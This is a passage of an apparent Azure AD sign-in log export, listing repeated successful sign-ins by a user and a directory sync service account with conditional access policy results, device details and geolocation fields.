'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3109113e-8f92-47c2-a124-2483dad20200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3109113e-8f92-47c2-a124-2483dad20200,SigninLogs,Sucess,33.0175209,35.44601059
+1845,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,686a49ef-89c1-4909-8eb3-601819e42b44,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",67310a2e-a313-4902-99ba-eeb2508e0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,67310a2e-a313-4902-99ba-eeb2508e0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1846,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6287f44-8678-40aa-94e4-3bbf37bab9cb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",03932e54-fdb0-4c07-8405-8b9ef3470400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9ef3470400,SigninLogs,Sucess,36.6404686,-78.26995087
+1847,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:57.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f6287f44-8678-40aa-94e4-3bbf37bab9cb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",03932e54-fdb0-4c07-8405-8b9ef3470400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9ef3470400,SigninLogs,Sucess,36.6404686,-78.26995087
+1848,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e98080400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03932e54-fdb0-4c07-8405-8b9e98080400,SigninLogs,Sucess,33.0175209,35.44601059
+1849,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:05.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,686a49ef-89c1-4909-8eb3-601819e42b44,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",67310a2e-a313-4902-99ba-eeb2508e0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,67310a2e-a313-4902-99ba-eeb2508e0200,SigninLogs,Sucess,36.6404686,-78.26995087
+1850,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:40.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 03:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e98080400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03932e54-fdb0-4c07-8405-8b9e98080400,SigninLogs,Sucess,33.0175209,35.44601059
+1851,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 04:14,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7177d659-5709-4c9c-976e-940f39f50200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7177d659-5709-4c9c-976e-940f39f50200,SigninLogs,Sucess,33.0175209,35.44601059
+1852,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:55.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8160939d-9555-4d8c-b504-5529fb75da5e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form 